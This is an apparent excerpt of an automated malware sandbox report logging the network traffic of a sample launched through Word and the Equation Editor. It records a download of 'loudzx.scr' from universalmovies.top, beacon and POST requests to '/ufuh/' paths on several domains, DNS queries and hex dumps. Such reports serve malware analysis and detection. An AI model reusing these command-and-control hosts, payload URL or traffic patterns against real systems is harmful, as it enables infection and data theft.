            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\hNYCAdXMNkWAImSJFAjXwpJUwycZfdWaCUBeflWikODcqwseQLOqHJVNjXXgRfFzWIkdXsePqDEVV\sQNFFcxirzZbXqUULewCRS.exeDNS query: www.99b6q.xyz
            Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 6b0dc43f177fcd6d2946d55121243d1b
            Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: keep-aliveDate: Mon, 20 May 2024 06:54:30 GMTLast-Modified: Thu, 18 Jan 2018 20:17:17 GMTCache-Control: max-age=120ETag: "m5a6100cds6cee7"Content-type: application/zip; charset=utf-8Content-length: 446183Data Raw: 50 4b 03 04 14 00 00 00 08 00 86 13 59 4b 18 14 41 7f d2 04 00 00 eb 13 00 00 0b 00 1c 00 73 71 6c 69 74 65 33 2e 64 65 66 55 54 09 00 03 4c 94 ef 59 4c 94 ef 59 75 78 0b 00 01 04 e8 03 00 00 04 64 00 00 00 85 98 cd 92 dc 28 0c 80 ef 79 9b 64 b6 a6 f6 05 72 de 54 76 0f 7b 73 61 2c bb a9 c1 e0 f0 d3 3d 33 4f bf e2 a7 1b 09 dc d9 d3 8c 3e 19 10 42 12 a2 bf ff fb e3 af 9f ff fc fd c5 ff d2 2a c0 cb 24 b6 cd c1 26 02 4c d2 9a 00 ef e1 54 13 0d e1 31 d8 09 3f 04 e3 95 35 0f 3c 0b f9 16 8f 69 55 46 f9 4b 4f 11 86 9e 1d 62 03 3e 73 55 38 d8 05 0e 30 5b af f0 01 8e c6 94 59 a6 59 db 79 24 af 7f 70 b6 d8 38 6b e0 4c d1 75 2b e8 c7 99 a8 35 27 87 70 62 87 00 ae f3 49 a7 44 09 de 9f 29 0d fe ed 74 16 17 07 c7 21 3b 8b 07 f9 fa 3a b2 de ec ab d0 b1 5b e1 13 9c 1d 7d 75 a7 74 02 14 a7 f9 23 80 e7 48 6a eb 81 23 7b 80 e1 c4 81 58 7a 32 7e 75 73 f8 7f 43 d1 7f 4c 17 61 16 4d 1d 90 60 50 3b d8 d8 7c 20 85 91 a0 9f 85 9f c4 39 36 62 b5 d4 20 5c de 26 06 12 c5 74 1f 59 9a ae df 1a b0 5a 8b 80 f3 4e 06 60 81 e5 a9 82 9c 03 aa e2 6e 78 28 de 19 73 24 85 e3 78 1e 50 15 2e 22 88 59 a0 8d 2c 68 ce 94 e3 84 0b 48 1d 3e 8e 71 58 e5 27 23 78 9e 54 aa 46 b3 78 ae 54 78 66 e2 b9 65 d6 a9 4d 9d 0f 20 aa 71 1c 6e 57 9f bb a2 69 4e 46 d1 44 22 ec e4 cb 13 6f f1 64 92 76 df 55 98 2e d6 be 51 76 28 8d 81 9e c3 63 83 f0 44 13 3d 8b a7 fd d0 10 60 00 cc 2a b3 aa 8d 8a c9 ec 69 99 6b be 34 0d 26 5e 2e d3 35 46 9f 2a e8 e4 9d 8a 65 41 d1 ad d1 c8 b3 e9 ee 7c 9c ed ae 39 99 6c b7 4b 1c 4d 2e 94 7e 9e 82 ba cb 05 dc b0 14 f2 02 ab 8e e4 66 49 94 3b 08 c9 8a ee 66 f1 31 3a 0b c9 1e 03 29 cf 4b 29 5c d6 e8 0f ce b0 82 60 72 ed b0 5b c7 34 3e 88 10 5b 5a a7 7c 12 0e 37 81 41 f8 80 68 45 8a 48 6d c5 72 52 ac aa d6 5f 70 dc 52 36 d7 74 ce 49 bb 30 79 f7 5b 27 12 d7 23 f0 a1 95 4e 78 07 49 84 03 37 8f 4b 20 a0 50 39 12 8a d9 bc f4 d1 b0 f2 5d e1 c0 47 1d a6 a4 6c db 4e ae ce 31 e9 ac 26 d0 08 ad 3e db 1c ab 03 2e 94 54 7d 20 4c 97 5c d1 4b 62 75 f8 3d 05 03 63 dd 60 2c b9 42 a3 79 d2 5e c9 ed 91 9a 0d c5 cd c8 f7 ab 8b 47 5b 41 0b 1f 10 7b 70 61 72 f6 a6 9a 3f b4 9a 71 36 76 5e 0d 61 4f b0 cf 64 2d ad a8 d9 4f 8e 5b db 76 7e bb d0 da ca 4e 24 c5 b4 84 db 24 30 a4 f6 1e 5e d4 76 b9 09 da 29 54 05 2b 2d fb e1 70 bb 6b 93 3d f5 44 8e fd a9 33 22 33 60 3d 48 61 ec f8 0a c2 ac b8 f6 2c 90 04 31 a9 46 f9 b0 37 af b0 16 20 09 24 7a 93 48 d3 df 7a b4 63 a1 22 6b 1d d3 39 67 27 0f b5 e9 70 80 2d 16 f4 32 59 ea 41 e8 7a 04 be f4 f0 e4 3b fe 95 4d 39 40 65 6c 98 bd 1f ba 19 87 b2 dd 0d aa 1a 02 7e 02 55 26 71 f0 a4 fc e0 02 e4 82 c9 d2 b3 8e a8 66 2d eb 4b 08 63 6b 65 da 5d ff 95 62 de 58 77 0a 89 6f 29 9e 58 11 61 1a 63 71 3b e7 aa 60 ed 4c 6a 79 d5 d1 de a3 a1 d1 74 d6 a9 57 d6 77 d5 15 fb 38 b3 7b be 62 d6 25 10 36 6e b2 d0 f9 74 86 af af a3 03 b
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{48E7344B-2A3F-40E3-AC6B-5E4E921F9721}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /loudzx.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ufuh/?84O0=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3210000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /ufuh/?84O0=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.kinkynerdspro.blogUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.xn--matfrmn-jxa4m.seUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?84O0=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&-Hc=N8_LbDFHuLL4ejZ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.primeplay88.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?-Hc=N8_LbDFHuLL4ejZ&84O0=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.aceautocorp.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: EQNEDT32.EXE, 00000002.00000002.359979447.00000000006B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: universalmovies.top
            Source: global trafficDNS traffic detected: DNS query: www.besthomeincome24.com
            Source: global trafficDNS traffic detected: DNS query: www.terelprime.com
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.99b6q.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kinkynerdspro.blog
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.primeplay88.org
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: unknownHTTP traffic detected: POST /ufuh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2161Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.kinkynerdspro.blogOrigin: http://www.kinkynerdspro.blogReferer: http://www.kinkynerdspro.blog/ufuh/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 38 34 4f 30 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 43 6b 32 68 6f 67 75 6d 33 70 51 42 4c 62 4d 66 43 46 62 6b 77 4c 4f 36 69 4b 6f 46 4a 53 70 65 64 37 4a 72 73 58 67 4c 6c 61 57 4d 6d 47 66 53 4e 2b 4c 36 7a 63 78 37 58 33 39 35 55 6b 46 53 2b 69 41 4f 6d 44 58 62 33 6b 66 30 62 56 71 32 51 49 59 6e 57 4b 76 74 57 48 45 48 76 51 39 73 43 52 77 78 66 68 6a 4b 4d 6c 7a 6f 48 5a 47 75 66 78 39 50 58 52 36 78 71 44 39 56 6f 72 51 43 4d 35 52 78 31 71 4d 73 73 4f 61 51 6e 43 6b 67 63 4b 70 43 6f 73 69 69 54 69 44 69 33 76 5a 43 4f 70 39 41 30 6d 66 79 71 57 75 58 71 65 4d 79 75 4f 48 64 39 61 46 4c 51 59 46 71 30 5a 66 4e 69 50 68 5a 44 56 61 62 4c 39 6f 31 6b 36 53 79 34 52 53 68 65 30 61 4f 71 57 59 4e 73 58 49 41 78 56 73 56 4a 35 6a 51 69 64 63 49 77 77 39 4b 30 75 59 49 36 6e 62 72 2f 51 52 58 46 52 53 33 31 4f 6e 39 61 35 39 45 52 70 34 78 44 42 66 6e 57 35 67 4c 48 53 6b 6b 56 7a 38 6b 36 55 46 65 42 68 70 6f 2f 36 74 48 7a 6c 76 38 62 48 54 61 5a 36 6b 6b 58 46 63 52 6e 7a 79 6a 63 59 51 53 32 43 71 31 45 55 42 50 78 37 56 46 67 71 6a 6e 6d 56 4e 74 37 50 76 4f 67 78 61 75 71 51 45 2f 73 6f 46 51 46 54 30 4d 5a 6d 69 71 5a 4a 63 6a 30 39 39 62 58 4b 2b 73 4c 79 45 76 52 41 52 62 48 6e 61 61 69 55 66 62 63 53 51 69 49 61 50 31 6d 58 2f 48 42 63 64 6e 43 47 43 39 54 33 6f 65 4a 61 45 73 2f 6a 63 6d 4d 74 6f 53 66 39 45 7a 7a 42 32 53 42 37 57 44 67 6c 62 47 33 68 36 43 4c 77 35 4c 75 43 5a 53 6a 57 34 72 65 69 75 4c 47 43 57 42 74 6f 53 33 41 6e 6a 48 36 41 77 72 66 4f 57 55 2f 4b 55 61 37 5a 6d 6a 32 63 71 38 57 31 6b 4e 78 59 7a 66 59 32 69 51 50 70 65 4d 31 6e 72 49 44 34 6b 70 49 31 33 30 38 2f 2b 50 73 42 4f 64 58 7a 4d 78 70 45 4c 4f 6d 74 74 6d 78 4e 66 6a 4d 4b 63 43 7a 6a 6a 64 72 44 61 64 51 4c 58 33 38 79 6f 49 45 74 47 6a 66 6c 4b 4e 39 74 45 7a 41 54 45 37 37 41 45 48 73 37 71 50 36 61 65 39 69 69 42 33 70 63 66 77 43 52 36 31 74 51 6d 67 51 6f 70 63 68 2b 56 72 56 4e 76 49 6e 39 50 59 6d 71 68 45 66 6e 58 75 2f 73 46 52 57 31 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 May 2024 06:54:20 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 20 May 2024 06:54:29 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 31 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 34 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: <head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 May 2024 06:55:43 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 9730Content-Type: text/html; charset=UTF-8Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 70 5e 1a fc ac 75 63 8e 96 42 4e 36 d9 e3 5f db 06 85 cf 85 6d d7 8e 10 95 7d 2c 8a f8 04 35 43 db 65 86 7b 66 af 97 51 1f cd 6f dd a3 f6 be 1b f6 0e 2a 98 50 0e 9d f8 6e fb 7a e1 8b 5d f1 bc 79 de 38 76 99 b8 33 f0 3c 01 26 7b de 08 69 f3 79 83 e0 15 3c 6f 44 cc 38 0b 9f 37 a9 bc a6 f2 79 83 08 d2 57 8f 0a 24 1d 37 02 44 90 3b ef 71 8e b9 f3 fe 65 bf 3b ef 7f 7a 7f 9b 3b 7f c4 9c 6c ad bf 68 42 b5 19 6a e5 bd 72 18 f8 24 b1 63 cf 3a 79 19 a9 bc be ae f9 9b 73 44 9f 75 2a f8 75 56 51 3d f9 59 db 2a 61 31 0b d1 3c 97 cb cd dd cd 29 16 70 ea 50 0b 3a 07 98 eb b4 44 3f 5e 37 70 b7 59 de cc d5 d9 1f 74 64 28 98 8e 31 c4 11 5d ee fb 30 d4 81 1e f3 f6 6d ff 84 af 26 31 fe aa 6f da 79 57 68 52 e8 37 8a a2 95 ef 28 e0 2b 3f e9 bf b7 01 9e 4b a7 9d eb cc f0 e8 8d 55 7b cd 9c f6 0f 5e 1f 03 43 8a db 1a 2b 22 8f ee da b7 c0 63 ac b9 fc b2 c6 d3 3c 93 b0 79 cc 88 27 af a9 59 51 f3 1c fe a5 6b 1f 70 c2 89 66 b5 1a ce ca 31 09 d7 4e 7c 92 ab e7 80 89 66 6d d7 f7 df f4 d5 07 9e 70 c2 eb 92 cc 57 94 3e fa f7 6e f0 a1 fc 6c ad 7a 0b 34 db 6b 5f 5c 9e ef af ca 2b f4 29 9b 87 77 65 61 62 ab 80 ae 6d 43 5f 10 8a 74 ad d0 f4 ac f8 b7 27 f1 4c 6a e2 6b a9 5f 0d e8 aa aa ec 93 7f 99 31 93 df 78 a2 62 fb 0b 03 8f a7 5a 39 8d 2a 94 21 54 78 06 54 af 15 3d 9f 9a 2c ac 9f 4f 4d db 86 cf a7 56 f3 f6 f9 24 39 6f 9e 4f 32 51 a9 6b 35 04 fa dd 77 d7 00 7f bc 11 c5 0d ea 13 9b 56 fd bd 6c 88 76 13 22 13 e8 94 f0 6a 75 7d 4f db 46 ef d9 45 fc c4 3a 49 Data Ascii: SC@E`:H@XZgiN~=%n(@_c2$Y2,9zypN1$g
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 May 2024 06:55:46 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://aceautocorp.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 9730Content-Type: text/html; charset=UTF-8Data Raw: 13 53 cb 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 9f a9 da 9f a5 cb e9 19 9e 48 84 03 40 00 58 5a a8 14 67 8b 7f 69 4e 7e b3 3d 1e 88 04 25 6e 28 82 03 40 c5 cb e5 5f b6 ea f3 bc a5 63 32 81 24 59 32 81 97 2c 39 06 a2 b9 7a 90 79 aa ea 9e 8e a8 9e d9 d1 70 a8 17 4e 31 24 c5 e2 1d 67 be 84 aa ae ae ee e1 fb fb 91 c1 33 84 e8 38 72 ec 19 61 0b d8 70 64 b8 64 58 86 6c 3d 86 6a b2 fd b4 fb 06 11 51 14 51 93 76 db 70 79 99 58 f7 de 86 10 ac 25 02 13 93 a1 9a c9 d8 e4 97 03 27 30 58 c8 54 32 df 5a 8c b9 bd 10 f9 21 22 92 70 57 3d 45 37 cf 39 e5 74 4c 81 19 a8 3e 4a c0 e0 76 c9 35 60 d2 59 2b a4 87 09 0e f6 69 16 b9 6c 1f ae 50 b2 ab bd c4 70 95 53 0a 88 16 3a 07 45 5b 15 ee 10 81 d8 52 ea 36 2b 81 cb 7c 4a d7 a9 3f ec d6 2f 07 d6 47 75 3d 07 c6 20 1d 63 99 16 f1 4c d7 9e 29 be c0 be 19 18 8c 07 76 25 90 77 ef 5d 88 12 3e d7 1a 3e 9f bc 81 d4 31 ce 7a f6 48 cb 0f 7d 37 fc 00 ab fb 6a dd 0c 0e f3 35 68 b5 af 0f eb 13 37 5c 6c b3 51 b5 be df 84 4d 3b 4e f0 a0 d0 b4 c7 0a 88 a3 69 9d 91 4b 37 9c 15 e8 a8 83 70 5e 1a fc ac 75 63 8e 96 42 4e 36 d9 e3 5f db 06 85 cf 85 6d d7 8e 10 95 7d 2c 8a f8 04 35 43 db 65 86 7b 66 af 97 51 1f cd 6f dd a3 f6 be 1b f6 0e 2a 98 50 0e 9d f8 6e fb 